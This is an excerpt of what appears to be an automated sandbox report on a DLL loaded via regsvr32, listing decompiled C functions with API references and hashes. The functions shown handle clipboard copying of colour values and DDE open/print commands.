					_t86 = GlobalAlloc(0x2000,  *((intOrPtr*)(_t89 - 0xc)) + 1);
					E100486D0(GlobalLock(_t86), _t89);
					GlobalUnlock(_t86);
					SetClipboardData(1, _t86);
					CloseClipboard();
				}
				L100013E3( *((intOrPtr*)(_t90 - 0x20)) + 0xfffffff0, _t82);
				return E10047725(L100013E3(_t89 - 0x10, _t82));
			}












                                                                                                                0x1000105a
                                                                                                                0x1000105a
                                                                                                                0x10008ade
                                                                                                                0x10008ae5
                                                                                                                0x10008aea
                                                                                                                0x10008af2
                                                                                                                0x10008b04
                                                                                                                0x10008b0f
                                                                                                                0x10008b25
                                                                                                                0x10008b33
                                                                                                                0x10008b3e
                                                                                                                0x10008b43
                                                                                                                0x10008b4a
                                                                                                                0x10008b4b
                                                                                                                0x10008b4f
                                                                                                                0x10008b53
                                                                                                                0x10008b58
                                                                                                                0x10008b5e
                                                                                                                0x10008b64
                                                                                                                0x10008b65
                                                                                                                0x10008b69
                                                                                                                0x10008b6e
                                                                                                                0x10008b73
                                                                                                                0x10008b74
                                                                                                                0x10008b7a
                                                                                                                0x10008b7d
                                                                                                                0x10008b81
                                                                                                                0x10008b8b
                                                                                                                0x10008b96
                                                                                                                0x10008b9e
                                                                                                                0x10008ba1
                                                                                                                0x10008ba3
                                                                                                                0x10008bb9
                                                                                                                0x10008bc4
                                                                                                                0x10008bcc
                                                                                                                0x10008bd5
                                                                                                                0x10008bdb
                                                                                                                0x10008bdb
                                                                                                                0x10008be7
                                                                                                                0x10008bf9

                                                                                                                APIs
                                                                                                                • __EH_prolog3.LIBCMT ref: 10008AE5
                                                                                                                  • Part of subcall function 10001041: SendMessageA.USER32 ref: 10001CFD
                                                                                                                • OpenClipboard.USER32(?), ref: 10008B96
                                                                                                                • EmptyClipboard.USER32 ref: 10008BA3
                                                                                                                • GlobalAlloc.KERNEL32(00002000,?), ref: 10008BB3
                                                                                                                • GlobalLock.KERNEL32 ref: 10008BBC
                                                                                                                • _strcat.LIBCMT ref: 10008BC4
                                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 10008BCC
                                                                                                                • SetClipboardData.USER32 ref: 10008BD5
                                                                                                                • CloseClipboard.USER32 ref: 10008BDB
                                                                                                                Strings
                                                                                                                • RGB( %d, %d, %d );// similar to %s (whose exact value is RGB( %d, %d, %d )); COLORREF value is 0x%08X; web value is #%02X%02X%02X, xrefs: 10008B85
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Clipboard$Global$AllocCloseDataEmptyH_prolog3LockMessageOpenSendUnlock_strcat
                                                                                                                • String ID: RGB( %d, %d, %d );// similar to %s (whose exact value is RGB( %d, %d, %d )); COLORREF value is 0x%08X; web value is #%02X%02X%02X
                                                                                                                • API String ID: 1778263509-3278946217
                                                                                                                • Opcode ID: 3b6d42ae873fa823983a9a20d7620ff21ab01c7bc22cecd28903bb8ef0bbf29c
                                                                                                                • Instruction ID: 36a7aecb0b2f17e2982f82c563a3aee624c7f238dc7bb181070029f9f0c6a155
                                                                                                                • Opcode Fuzzy Hash: 3b6d42ae873fa823983a9a20d7620ff21ab01c7bc22cecd28903bb8ef0bbf29c
                                                                                                                • Instruction Fuzzy Hash: 6A31D175900209AFEB14DBB4CC89AFFBBB9FF45340F140029F552E3291DA38AA40CB20
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1002870B Relevance: 16.2, APIs: 5, Strings: 4, Instructions: 483windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 96%
                                                                                                                			E1002870B(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t208;
				signed int _t209;
				void* _t212;
				signed int _t213;
				void* _t216;
				signed int _t217;
				intOrPtr _t221;
				void* _t227;
				void* _t232;
				void* _t239;
				intOrPtr _t243;
				void* _t248;
				void* _t259;
				void* _t272;
				signed int _t273;
				void* _t279;
				void* _t284;
				void* _t291;
				void* _t295;
				signed int _t296;
				void* _t302;
				void* _t307;
				void* _t314;
				void* _t318;
				signed int _t319;
				void* _t325;
				void* _t328;
				void* _t330;
				void* _t337;
				signed int _t344;
				intOrPtr* _t347;
				void* _t349;
				void* _t386;
				void* _t390;
				intOrPtr* _t471;
				intOrPtr _t478;
				intOrPtr _t480;
				void* _t484;
				void* _t485;

				_t485 = __eflags;
				_t477 = __esi;
				_t474 = __edx;
				_push(0x34);
				E1004764D(0x1008fe1e, __ebx, __edi, __esi);
				 *((intOrPtr*)(_t484 - 0x14)) = __ecx;
				_push( *((intOrPtr*)(_t484 + 8)));
				E1000B543(__ebx, _t484 + 8, __edi, __esi, _t485);
				 *((intOrPtr*)(_t484 - 4)) = 0;
				E10019CFD(_t484 - 0x40);
				 *((char*)(_t484 - 4)) = 1;
				 *((intOrPtr*)(_t484 - 0x30)) = 4;
				_t208 = E10027DD9(_t484 + 8, _t484 - 0x18, 7);
				 *((char*)(_t484 - 4)) = 2;
				_t209 = E1001BBE2(__ebx, _t208, __edx, 0, __esi, _t484, "[open(\"");
				asm("sbb bl, bl");
				_t370 =  ~_t209 + 1;
				 *((char*)(_t484 - 4)) = 1;
				L100013E3( *((intOrPtr*)(_t484 - 0x18)) + 0xfffffff0, __edx);
				_t386 = _t484 + 8;
				if( ~_t209 + 1 == 0) {
					_t212 = E10027DD9(_t386, _t484 - 0x18, 8);
					 *((char*)(_t484 - 4)) = 4;
					_t213 = E1001BBE2(_t370, _t212, __edx, 0, __esi, _t484, "[print(\"");
					asm("sbb bl, bl");
					_t373 =  ~_t213 + 1;
					 *((char*)(_t484 - 4)) = 1;
					L100013E3( *((intOrPtr*)(_t484 - 0x18)) + 0xfffffff0, __edx);
					__eflags =  ~_t213 + 1;
					_t390 = _t484 + 8;
					if( ~_t213 + 1 == 0) {
						_t216 = E10027DD9(_t390, _t484 - 0x18, 0xa);
						 *((char*)(_t484 - 4)) = 6;
						_t217 = E1001BBE2(_t373, _t216, _t474, 0, _t477, _t484, "[printto(\"");
						asm("sbb bl, bl");
						_t373 =  ~_t217 + 1;
						 *((char*)(_t484 - 4)) = 1;
						L100013E3( *((intOrPtr*)(_t484 - 0x18)) + 0xfffffff0, _t474);
						__eflags =  ~_t217 + 1;
						if( ~_t217 + 1 == 0) {
							L33:
							 *((char*)(_t484 - 4)) = 0;
							E10019D3C(_t484 - 0x40, _t474);
							L100013E3( *((intOrPtr*)(_t484 + 8)) + 0xfffffff0, _t474);
							_t221 = 0;
							__eflags = 0;
							L34:
							return E10047725(_t221);
						}
						 *((intOrPtr*)(_t484 - 0x30)) = 3;
						__eflags =  *((intOrPtr*)( *((intOrPtr*)(_t484 + 8)) - 0xc)) + 0xfffffff6;
						_t227 = E10027D93(_t484 + 8, _t484 - 0x18,  *((intOrPtr*)( *((intOrPtr*)(_t484 + 8)) - 0xc)) + 0xfffffff6);
						 *((char*)(_t484 - 4)) = 7;
						L6:
						E10018A1F(_t373, _t484 + 8, _t484, _t227);
						 *((char*)(_t484 - 4)) = 1;
						L100013E3( *((intOrPtr*)(_t484 - 0x18)) + 0xfffffff0, _t474);
						_t478 = E10027BB5(_t484 + 8, 0x22, 0);
						_t487 = _t478 - 0xffffffff;
						if(_t478 == 0xffffffff) {
							goto L33;
						}
						_t232 = E10027DD9(_t484 + 8, _t484 - 0x18, _t478);
						 *((char*)(_t484 - 4)) = 8;
						E10018A1F(_t373, _t484 - 0x2c, _t484, _t232);
						 *((char*)(_t484 - 4)) = 1;
						L100013E3( *((intOrPtr*)(_t484 - 0x18)) + 0xfffffff0, _t474);
						_t239 = E10027D93(_t484 + 8, _t484 - 0x18,  *((intOrPtr*)( *((intOrPtr*)(_t484 + 8)) - 0xc)) - _t478);
						 *((char*)(_t484 - 4)) = 9;
						E10018A1F(_t373, _t484 + 8, _t484, _t239);
						 *((char*)(_t484 - 4)) = 1;
						L100013E3( *((intOrPtr*)(_t484 - 0x18)) + 0xfffffff0, _t474);
						 *((intOrPtr*)(_t484 - 0x18)) = 0;
						 *((intOrPtr*)(_t484 - 0x10)) = 1;
						_t243 =  *((intOrPtr*)(E1001E302(1, 0, _t478, _t487) + 4));
						_t488 =  *((intOrPtr*)(_t243 + 0x8c));
						if( *((intOrPtr*)(_t243 + 0x8c)) == 0) {
							 *((intOrPtr*)(_t484 - 0x18)) =  *((intOrPtr*)( *((intOrPtr*)(E1001E302(1, 0, _t478, __eflags) + 4)) + 0x8c));
						} else {
							_t478 =  *((intOrPtr*)(E1001E302(1, 0, _t478, _t488) + 4));
							 *((intOrPtr*)( *((intOrPtr*)(E1001E302(1, 0, _t478, _t488) + 4)) + 0x4c)) =  *((intOrPtr*)(_t478 + 0x8c));
							 *((intOrPtr*)( *((intOrPtr*)(E1001E302(1, 0, _t478, _t488) + 4)) + 0x8c)) = _t484 - 0x40;
						}
						_t489 =  *((intOrPtr*)(_t484 - 0x30)) - 1;
						if( *((intOrPtr*)(_t484 - 0x30)) != 1) {
							__eflags =  *((intOrPtr*)(_t484 - 0x30)) - 3;
							if( *((intOrPtr*)(_t484 - 0x30)) != 3) {
								L28:
								_t479 = E10027822( *((intOrPtr*)(_t484 - 0x14)));
								_t248 = E1001E302(1, 0, _t479, __eflags);
								_t474 =  *((intOrPtr*)( *((intOrPtr*)(_t248 + 4))));
								_t378 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t248 + 4)))) + 0x88))( *((intOrPtr*)(_t484 - 0x2c)));
								 *((intOrPtr*)( *((intOrPtr*)(E1001E302(_t378, 0, _t479, __eflags) + 4)) + 0x8c)) = _t484 - 0x40;
								SendMessageA( *( *((intOrPtr*)( *((intOrPtr*)(E1001E302(_t378, 0, _t479, __eflags) + 4)) + 0x20)) + 0x20), 0x111, 0xe108, 0);
								 *((intOrPtr*)( *((intOrPtr*)(E1001E302(_t378, 0, _t479, __eflags) + 4)) + 0x8c)) = 0;
								_t259 = E10027822( *((intOrPtr*)(_t484 - 0x14)));
								__eflags = _t259 - _t479;
								if(_t259 > _t479) {
									 *((intOrPtr*)( *_t378 + 0x7c))();
								}
								__eflags = E10022028();
								if(__eflags == 0) {
									PostMessageA( *( *((intOrPtr*)( *((intOrPtr*)(E1001E302(_t378, 0, _t479, __eflags) + 4)) + 0x20)) + 0x20), 0x10, 0, 0);
								}
								goto L32;
							}
							_t272 = E10027DD9(_t484 + 8, _t484 - 0x1c, 3);
							_t479 = 0x1009db20;
							 *((char*)(_t484 - 4)) = 0xa;
							_t273 = E1001BBE2(1, _t272, _t474, 0, 0x1009db20, _t484, 0x1009db20);
							__eflags = _t273;
							_t378 = 0 | _t273 != 0x00000000;
							 *((char*)(_t484 - 4)) = 1;
							L100013E3( *((intOrPtr*)(_t484 - 0x1c)) + 0xfffffff0, _t474);
							__eflags = _t273 != 0;
							if(__eflags == 0) {
								_t279 = E10027D93(_t484 + 8, _t484 - 0x1c,  *((intOrPtr*)( *((intOrPtr*)(_t484 + 8)) - 0xc)) + 0xfffffffd);
								 *((char*)(_t484 - 4)) = 0xb;
								E10018A1F(_t378, _t484 + 8, _t484, _t279);
								 *((char*)(_t484 - 4)) = 1;
								L100013E3( *((intOrPtr*)(_t484 - 0x1c)) + 0xfffffff0, _t474);
								_t378 = E10027BB5(_t484 + 8, 0x22, 0);
								__eflags = _t378 - 0xffffffff;
								if(__eflags == 0) {
									goto L21;
								}
								_t284 = E10027DD9(_t484 + 8, _t484 - 0x1c, _t378);
								 *((char*)(_t484 - 4)) = 0xc;
								E10018A1F(_t378, _t484 - 0x28, _t484, _t284);
								 *((char*)(_t484 - 4)) = 1;
								L100013E3( *((intOrPtr*)(_t484 - 0x1c)) + 0xfffffff0, _t474);
								_t291 = E10027D93(_t484 + 8, _t484 - 0x1c,  *((intOrPtr*)( *((intOrPtr*)(_t484 + 8)) - 0xc)) - _t378);
								 *((char*)(_t484 - 4)) = 0xd;
								E10018A1F(_t378, _t484 + 8, _t484, _t291);
								 *((char*)(_t484 - 4)) = 1;
								L100013E3( *((intOrPtr*)(_t484 - 0x1c)) + 0xfffffff0, _t474);
								_t295 = E10027DD9(_t484 + 8, _t484 - 0x1c, 3);
								 *((char*)(_t484 - 4)) = 0xe;
								_t296 = E1001BBE2(_t378, _t295, _t474, 0, 0x1009db20, _t484, 0x1009db20);
								__eflags = _t296;
								_t378 = _t378 & 0xffffff00 | _t296 != 0x00000000;
								 *((char*)(_t484 - 4)) = 1;
								L100013E3( *((intOrPtr*)(_t484 - 0x1c)) + 0xfffffff0, _t474);
								__eflags = _t378;
								if(__eflags != 0) {
									goto L21;
								}
								_t302 = E10027D93(_t484 + 8, _t484 - 0x1c,  *((intOrPtr*)( *((intOrPtr*)(_t484 + 8)) - 0xc)) + 0xfffffffd);
								 *((char*)(_t484 - 4)) = 0xf;
								E10018A1F(_t378, _t484 + 8, _t484, _t302);
								 *((char*)(_t484 - 4)) = 1;
								L100013E3( *((intOrPtr*)(_t484 - 0x1c)) + 0xfffffff0, _t474);
								_t378 = E10027BB5(_t484 + 8, 0x22, 0);
								__eflags = _t378 - 0xffffffff;
								if(__eflags == 0) {
									goto L21;
								}
								_t307 = E10027DD9(_t484 + 8, _t484 - 0x1c, _t378);
								 *((char*)(_t484 - 4)) = 0x10;
								E10018A1F(_t378, _t484 - 0x24, _t484, _t307);
								 *((char*)(_t484 - 4)) = 1;
								L100013E3( *((intOrPtr*)(_t484 - 0x1c)) + 0xfffffff0, _t474);
								_t314 = E10027D93(_t484 + 8, _t484 - 0x1c,  *((intOrPtr*)( *((intOrPtr*)(_t484 + 8)) - 0xc)) - _t378);
								 *((char*)(_t484 - 4)) = 0x11;
								E10018A1F(_t378, _t484 + 8, _t484, _t314);
								 *((char*)(_t484 - 4)) = 1;
								L100013E3( *((intOrPtr*)(_t484 - 0x1c)) + 0xfffffff0, _t474);
								_t318 = E10027DD9(_t484 + 8, _t484 - 0x1c, 3);
								 *((char*)(_t484 - 4)) = 0x12;
								_t319 = E1001BBE2(_t378, _t318, _t474, 0, 0x1009db20, _t484, 0x1009db20);
								__eflags = _t319;
								_t378 = _t378 & 0xffffff00 | _t319 != 0x00000000;
								 *((char*)(_t484 - 4)) = 1;
								L100013E3( *((intOrPtr*)(_t484 - 0x1c)) + 0xfffffff0, _t474);
								__eflags = _t378;
								if(__eflags != 0) {
									goto L21;
								}
								_t325 = E10027D93(_t484 + 8, _t484 - 0x1c,  *((intOrPtr*)( *((intOrPtr*)(_t484 + 8)) - 0xc)) + 0xfffffffd);
								 *((char*)(_t484 - 4)) = 0x13;
								E10018A1F(_t378, _t484 + 8, _t484, _t325);
								 *((char*)(_t484 - 4)) = 1;
								L100013E3( *((intOrPtr*)(_t484 - 0x1c)) + 0xfffffff0, _t474);
								_t328 = E10027BB5(_t484 + 8, 0x22, 0);
								_t479 = _t328;
								__eflags = _t328 - 0xffffffff;
								if(__eflags == 0) {
									goto L21;
								}
								_t330 = E10027DD9(_t484 + 8, _t484 - 0x1c, _t479);
								 *((char*)(_t484 - 4)) = 0x14;
								E10018A1F(_t378, _t484 - 0x20, _t484, _t330);
								 *((char*)(_t484 - 4)) = 1;
								L100013E3( *((intOrPtr*)(_t484 - 0x1c)) + 0xfffffff0, _t474);
								_t337 = E10027D93(_t484 + 8, _t484 - 0x1c,  *((intOrPtr*)( *((intOrPtr*)(_t484 + 8)) - 0xc)) - _t479);
								 *((char*)(_t484 - 4)) = 0x15;
								E10018A1F(_t378, _t484 + 8, _t484, _t337);
								__eflags =  *((intOrPtr*)(_t484 - 0x1c)) + 0xfffffff0;
								 *((char*)(_t484 - 4)) = 1;
								L100013E3( *((intOrPtr*)(_t484 - 0x1c)) + 0xfffffff0, _t474);
								goto L28;
							}
							L21:
							 *((intOrPtr*)(_t484 - 0x10)) = 0;
							goto L32;
						} else {
							_t378 =  *( *((intOrPtr*)(E1001E302(1, 0, _t478, _t489) + 4)) + 0x20);
							_t480 =  *((intOrPtr*)( *((intOrPtr*)(E1001E302(_t378, 0, _t478, _t489) + 4)) + 0x4c));
							if(_t480 == 0xffffffff || _t480 == 1) {
								_t344 = IsIconic( *(_t378 + 0x20));
								asm("sbb esi, esi");
								_t479 = ( ~_t344 & 0x00000004) + 5;
							}
							E1001793D(_t378, _t479);
							_t493 = _t479 - 6;
							if(_t479 != 6) {
								SetForegroundWindow( *(_t378 + 0x20));
							}
							_t347 =  *((intOrPtr*)(E1001E302(_t378, 0, _t479, _t493) + 4));
							_t474 =  *_t347;
							_t471 = _t347;
							 *((intOrPtr*)( *_t347 + 0x88))( *((intOrPtr*)(_t484 - 0x2c)));
							_t349 = E10022028();
							_t494 = _t349;
							if(_t349 == 0) {
								E10022019(_t471, 1);
							}
							 *( *((intOrPtr*)(E1001E302(_t378, 0, _t479, _t494) + 4)) + 0x4c) =  *( *((intOrPtr*)(E1001E302(_t378, 0, _t479, _t494) + 4)) + 0x4c) | 0xffffffff;
							L32:
							 *((intOrPtr*)( *((intOrPtr*)(E1001E302(_t378, 0, _t479, _t494) + 4)) + 0x8c)) =  *((intOrPtr*)(_t484 - 0x18));
							 *((char*)(_t484 - 4)) = 0;
							E10019D3C(_t484 - 0x40, _t474);
							L100013E3( *((intOrPtr*)(_t484 + 8)) + 0xfffffff0, _t474);
							_t221 =  *((intOrPtr*)(_t484 - 0x10));
							goto L34;
						}
					}
					 *((intOrPtr*)(_t484 - 0x30)) = 2;
					_t227 = E10027D93(_t390, _t484 - 0x18,  *((intOrPtr*)( *((intOrPtr*)(_t484 + 8)) - 0xc)) + 0xfffffff8);
					 *((char*)(_t484 - 4)) = 5;
					goto L6;
				}
				 *((intOrPtr*)(_t484 - 0x30)) = 1;
				_t227 = E10027D93(_t386, _t484 - 0x18,  *((intOrPtr*)( *((intOrPtr*)(_t484 + 8)) - 0xc)) + 0xfffffff9);
				 *((char*)(_t484 - 4)) = 3;
				goto L6;
			}










































                                                                                                                0x1002870b
                                                                                                                0x1002870b
                                                                                                                0x1002870b
                                                                                                                0x1002870b
                                                                                                                0x10028712
                                                                                                                0x10028717
                                                                                                                0x1002871a
                                                                                                                0x10028720
                                                                                                                0x1002872a
                                                                                                                0x1002872d
                                                                                                                0x1002873b
                                                                                                                0x1002873f
                                                                                                                0x10028746
                                                                                                                0x10028752
                                                                                                                0x10028756
                                                                                                                0x10028762
                                                                                                                0x10028767
                                                                                                                0x10028769
                                                                                                                0x1002876d
                                                                                                                0x10028774
                                                                                                                0x10028777
                                                                                                                0x100287a2
                                                                                                                0x100287ae
                                                                                                                0x100287b2
                                                                                                                0x100287be
                                                                                                                0x100287c3
                                                                                                                0x100287c5
                                                                                                                0x100287c9
                                                                                                                0x100287ce
                                                                                                                0x100287d0
                                                                                                                0x100287d3
                                                                                                                0x100287fb
                                                                                                                0x10028807
                                                                                                                0x1002880b
                                                                                                                0x10028817
                                                                                                                0x1002881c
                                                                                                                0x1002881e
                                                                                                                0x10028822
                                                                                                                0x10028827
                                                                                                                0x10028829
                                                                                                                0x10028d0f
                                                                                                                0x10028d12
                                                                                                                0x10028d16
                                                                                                                0x10028d21
                                                                                                                0x10028d26
                                                                                                                0x10028d26
                                                                                                                0x10028d28
                                                                                                                0x10028d2d
                                                                                                                0x10028d2d
                                                                                                                0x10028832
                                                                                                                0x1002883c
                                                                                                                0x10028847
                                                                                                                0x1002884c
                                                                                                                0x10028850
                                                                                                                0x10028854
                                                                                                                0x1002885f
                                                                                                                0x10028863
                                                                                                                0x10028873
                                                                                                                0x10028875
                                                                                                                0x10028878
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10028886
                                                                                                                0x1002888f
                                                                                                                0x10028893
                                                                                                                0x1002889e
                                                                                                                0x100288a2
                                                                                                                0x100288b7
                                                                                                                0x100288c0
                                                                                                                0x100288c4
                                                                                                                0x100288cf
                                                                                                                0x100288d3
                                                                                                                0x100288db
                                                                                                                0x100288de
                                                                                                                0x100288e6
                                                                                                                0x100288e9
                                                                                                                0x100288ef
                                                                                                                0x1002892b
                                                                                                                0x100288f1
                                                                                                                0x100288f6
                                                                                                                0x10028907
                                                                                                                0x10028915
                                                                                                                0x10028915
                                                                                                                0x1002892e
                                                                                                                0x10028931
                                                                                                                0x100289b8
                                                                                                                0x100289bc
                                                                                                                0x10028c4f
                                                                                                                0x10028c57
                                                                                                                0x10028c59
                                                                                                                0x10028c64
                                                                                                                0x10028c6e
                                                                                                                0x10028c7b
                                                                                                                0x10028c9a
                                                                                                                0x10028cab
                                                                                                                0x10028cb1
                                                                                                                0x10028cb6
                                                                                                                0x10028cb8
                                                                                                                0x10028cbe
                                                                                                                0x10028cbe
                                                                                                                0x10028cc6
                                                                                                                0x10028cc8
                                                                                                                0x10028cdc
                                                                                                                0x10028cdc
                                                                                                                0x00000000
                                                                                                                0x10028cc8
                                                                                                                0x100289cb
                                                                                                                0x100289d0
                                                                                                                0x100289d8
                                                                                                                0x100289dc
                                                                                                                0x100289e4
                                                                                                                0x100289e6
                                                                                                                0x100289ec
                                                                                                                0x100289f0
                                                                                                                0x100289f5
                                                                                                                0x100289f7
                                                                                                                0x10028a12
                                                                                                                0x10028a1b
                                                                                                                0x10028a1f
                                                                                                                0x10028a2a
                                                                                                                0x10028a2e
                                                                                                                0x10028a3e
                                                                                                                0x10028a40
                                                                                                                0x10028a43
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10028a4d
                                                                                                                0x10028a56
                                                                                                                0x10028a5a
                                                                                                                0x10028a65
                                                                                                                0x10028a69
                                                                                                                0x10028a7e
                                                                                                                0x10028a87
                                                                                                                0x10028a8b
                                                                                                                0x10028a96
                                                                                                                0x10028a9a
                                                                                                                0x10028aa8
                                                                                                                0x10028ab0
                                                                                                                0x10028ab4
                                                                                                                0x10028abc
                                                                                                                0x10028abe
                                                                                                                0x10028ac4
                                                                                                                0x10028ac8
                                                                                                                0x10028acd
                                                                                                                0x10028acf
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10028ae6
                                                                                                                0x10028aef
                                                                                                                0x10028af3
                                                                                                                0x10028afe
                                                                                                                0x10028b02
                                                                                                                0x10028b12
                                                                                                                0x10028b14
                                                                                                                0x10028b17
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10028b25
                                                                                                                0x10028b2e
                                                                                                                0x10028b32
                                                                                                                0x10028b3d
                                                                                                                0x10028b41
                                                                                                                0x10028b56
                                                                                                                0x10028b5f
                                                                                                                0x10028b63
                                                                                                                0x10028b6e
                                                                                                                0x10028b72
                                                                                                                0x10028b80
                                                                                                                0x10028b88
                                                                                                                0x10028b8c
                                                                                                                0x10028b94
                                                                                                                0x10028b96
                                                                                                                0x10028b9c
                                                                                                                0x10028ba0
                                                                                                                0x10028ba5
                                                                                                                0x10028ba7
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10028bbe
                                                                                                                0x10028bc7
                                                                                                                0x10028bcb
                                                                                                                0x10028bd6
                                                                                                                0x10028bda
                                                                                                                0x10028be5
                                                                                                                0x10028bea
                                                                                                                0x10028bec
                                                                                                                0x10028bef
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10028bfd
                                                                                                                0x10028c06
                                                                                                                0x10028c0a
                                                                                                                0x10028c15
                                                                                                                0x10028c19
                                                                                                                0x10028c2e
                                                                                                                0x10028c37
                                                                                                                0x10028c3b
                                                                                                                0x10028c43
                                                                                                                0x10028c46
                                                                                                                0x10028c4a
                                                                                                                0x00000000
                                                                                                                0x10028c4a
                                                                                                                0x100289f9
                                                                                                                0x100289f9
                                                                                                                0x00000000
                                                                                                                0x10028937
                                                                                                                0x1002893f
                                                                                                                0x1002894a
                                                                                                                0x10028950
                                                                                                                0x1002895a
                                                                                                                0x10028964
                                                                                                                0x10028969
                                                                                                                0x10028969
                                                                                                                0x1002896f
                                                                                                                0x10028974
                                                                                                                0x10028977
                                                                                                                0x1002897c
                                                                                                                0x1002897c
                                                                                                                0x10028987
                                                                                                                0x1002898d
                                                                                                                0x1002898f
                                                                                                                0x10028991
                                                                                                                0x10028997
                                                                                                                0x1002899c
                                                                                                                0x1002899e
                                                                                                                0x100289a2
                                                                                                                0x100289a2
                                                                                                                0x100289af
                                                                                                                0x10028ce2
                                                                                                                0x10028ced
                                                                                                                0x10028cf6
                                                                                                                0x10028cfa
                                                                                                                0x10028d05
                                                                                                                0x10028d0a
                                                                                                                0x00000000
                                                                                                                0x10028d0a
                                                                                                                0x10028931
                                                                                                                0x100287d8
                                                                                                                0x100287ea
                                                                                                                0x100287ef
                                                                                                                0x00000000
                                                                                                                0x100287ef
                                                                                                                0x1002877c
                                                                                                                0x1002878e
                                                                                                                0x10028793
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                • __EH_prolog3.LIBCMT ref: 10028712
                                                                                                                  • Part of subcall function 1000B543: __EH_prolog3.LIBCMT ref: 1000B54A
                                                                                                                • IsIconic.USER32(?), ref: 1002895A
                                                                                                                • SetForegroundWindow.USER32 ref: 1002897C
                                                                                                                • SendMessageA.USER32 ref: 10028C9A
                                                                                                                • PostMessageA.USER32(?,00000010,00000000,00000000), ref: 10028CDC
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog3Message$ForegroundIconicPostSendWindow
                                                                                                                • String ID: ","$[open("$[print("$[printto("
                                                                                                                • API String ID: 2890980707-3790869113
                                                                                                                • Opcode ID: cab5bcdf4f39233bc5da1e22a27491cb8e2c22cc75d36e6d7f6608394fe4475a
                                                                                                                • Instruction ID: 6359ff3b39906331c569c86d2e27c1c2dd48ed764babf81416da55da0d5d941e
                                                                                                                • Opcode Fuzzy Hash: cab5bcdf4f39233bc5da1e22a27491cb8e2c22cc75d36e6d7f6608394fe4475a
                                                                                                                • Instruction Fuzzy Hash: 6F128239901148EFDB00DBB4C895AED7BB4FF14314F148259F956AB2D2DB70AB44CBA1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10043612 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 163COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 86%
                                                                                                                			E10043612(void* __ebx, intOrPtr* __ecx, void* __eflags, intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				signed int _v20;
				struct tagPOINT _v28;
				intOrPtr _v40;
				signed int _v72;
				char _v76;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t60;
				signed int _t62;
				signed int _t63;
				signed int _t67;
				signed int _t70;
				intOrPtr _t72;
				signed int _t79;
				short _t80;
				short _t87;
				short _t92;
				intOrPtr _t111;
				intOrPtr _t115;
				intOrPtr _t116;
				intOrPtr* _t118;

				_t115 = _a4;
				_t118 = __ecx;
				if(E10011BA4(__ecx, __eflags, _t115) == 0) {
					_t116 =  *((intOrPtr*)(_t115 + 4));
					_push(__ebx);
